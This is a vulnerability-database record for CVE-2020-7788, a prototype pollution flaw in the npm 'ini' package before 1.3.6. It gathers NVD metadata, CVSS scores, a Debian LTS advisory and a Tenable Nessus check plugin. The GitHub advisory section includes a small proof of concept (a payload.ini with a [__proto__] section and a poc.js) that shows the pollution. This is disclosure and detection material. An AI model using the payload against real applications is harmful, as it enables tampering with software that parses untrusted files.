ID CVE-2020-7788 Type cve Reporter cve@mitre.org Modified 2020-12-23T15:42:00
Description
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
{"id": "CVE-2020-7788", "bulletinFamily": "NVD", "title": "CVE-2020-7788", "description": "This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "published": "2020-12-11T11:15:00", "modified": "2020-12-23T15:42:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-7788", "reporter": "cve@mitre.org", "references": ["https://snyk.io/vuln/SNYK-JS-INI-1048974", "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1", "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html"], "cvelist": ["CVE-2020-7788"], "type": "cve", "lastseen": "2020-12-24T13:58:01", "edition": 5, "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-2503-1:20C90"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2503.NASL"]}, {"type": "github", "idList": ["GHSA-QQGX-2P2H-9C37"]}], "modified": "2020-12-24T13:58:01", "rev": 2}, "score": {"value": 4.6, "vector": "NONE", "modified": "2020-12-24T13:58:01", "rev": 2}, "twitter": {"counter": 5, "tweets": [{"link": "https://twitter.com/GrupoICA_Ciber/status/1342032067593441280", "text": "DEBIAN\nM\u00faltiples vulnerabilidades de severidad alta en productos DEBIAN: \n\nCVE-2020-8286,CVE-2020-8285,CVE-2020-29600,CVE-2020-28984,CVE-2020-7788,CVE-2020-28948,CVE-2020-28949\n\nM\u00e1s info en: https://t.co/dTubm4ztRa?amp=1\n/hashtag/ciberseguridad?src=hashtag_click /hashtag/grupoica?src=hashtag_click /hashtag/debian?src=hashtag_click"}, {"link": "https://twitter.com/WolfgangSesin/status/1341810873409687558", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-7788 (debian_linux, ini)) has been published on https://t.co/QcopJVwgxd?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1341810873409687558", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2020-7788 (debian_linux, ini)) has been published on https://t.co/QcopJVwgxd?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1341810927117754369", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-7788 (debian_linux, ini)) has been published on https://t.co/9376Y3CxvO?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1341810927117754369", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2020-7788 (debian_linux, ini)) has been published on https://t.co/9376Y3CxvO?amp=1"}], "modified": "2020-12-24T13:58:01"}, "vulnersScore": 4.6}, "cpe": ["cpe:/o:debian:debian_linux:9.0"], "affectedSoftware": [{"cpeName": "ini_project:ini", "name": "ini project ini", "operator": "lt", "version": "1.3.6"}, {"cpeName": "debian:debian_linux", "name": "debian debian linux", "operator": "eq", "version": "9.0"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:ini_project:ini:1.3.6:*:*:*:*:node.js:*:*", "versionEndExcluding": "1.3.6", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"], "cwe": ["CWE-400"], "scheme": null}
{"debian": [{"lastseen": "2020-12-25T01:24:16", "bulletinFamily": "unix", "cvelist": ["CVE-2020-7788"], "description": "- -------------------------------------------------------------------------\nDebian LTS Advisory DLA-2503-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Chris Lamb\nDecember 21, 2020 https://wiki.debian.org/LTS\n- -------------------------------------------------------------------------\n\nPackage : node-ini\nVersion : 1.1.0-1+deb9u1\nCVE ID : CVE-2020-7788\nDebian Bug : #977718\n\nIt was discovered that there was an issue in node-ini, a .ini format\nparser and serializer for Node.js, where an application could be\nexploited by a malicious input file.\n\nFor Debian 9 "Stretch", this problem has been fixed in version\n1.1.0-1+deb9u1.\n\nWe recommend that you upgrade your node-ini packages.\n\nFor the detailed security status of node-ini please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/node-ini\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 2, "modified": "2020-12-21T15:01:52", "published": "2020-12-21T15:01:52", "id": "DEBIAN:DLA-2503-1:20C90", "href": "https://lists.debian.org/debian-lts-announce/2020/debian-lts-announce-202012/msg00032.html", "title": "[SECURITY] [DLA 2503-1] node-ini security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2021-01-09T00:26:46", "bulletinFamily": "software", "cvelist": ["CVE-2020-7788"], "description": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require('fs')\nvar ini = require('ini')\n\nvar parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n> node poc.js\n{}\n{ polluted: 'polluted' }\n{ polluted: 'polluted' }\npolluted\n```", "edition": 4, "modified": "2021-01-08T21:20:41", "published": "2020-12-10T16:53:45", "id": "GHSA-QQGX-2P2H-9C37", "href": "https://github.com/advisories/GHSA-qqgx-2p2h-9c37", "title": "Prototype Pollution", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-12-29T01:42:49", "description": "It was discovered that there was an issue in node-ini, a .ini format\nparser and serializer for Node.js, where an application could be\nexploited by a malicious input file.\n\nFor Debian 9 'Stretch', this problem has been fixed in version\n1.1.0-1+deb9u1.\n\nWe recommend that you upgrade your node-ini packages.\n\nFor the detailed security status of node-ini please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/node-ini\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 3, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2020-12-22T00:00:00", "title": "Debian DLA-2503-1 : node-ini security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-7788"], "modified": "2020-12-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:node-ini", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2503.NASL", "href": "https://www.tenable.com/plugins/nessus/144541", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2503-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(144541);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/28\");\n\n script_cve_id(\"CVE-2020-7788\");\n\n script_name(english:\"Debian DLA-2503-1 : node-ini security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that there was an issue in node-ini, a .ini format\nparser and serializer for Node.js, where an application could be\nexploited by a malicious input file.\n\nFor Debian 9 'Stretch', this problem has been fixed in version\n1.1.0-1+deb9u1.\n\nWe recommend that you upgrade your node-ini packages.\n\nFor the detailed security status of node-ini please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/node-ini\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/node-ini\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/node-ini\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the affected node-ini package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-7788\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:node-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"node-ini\", reference:\"1.1.0-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}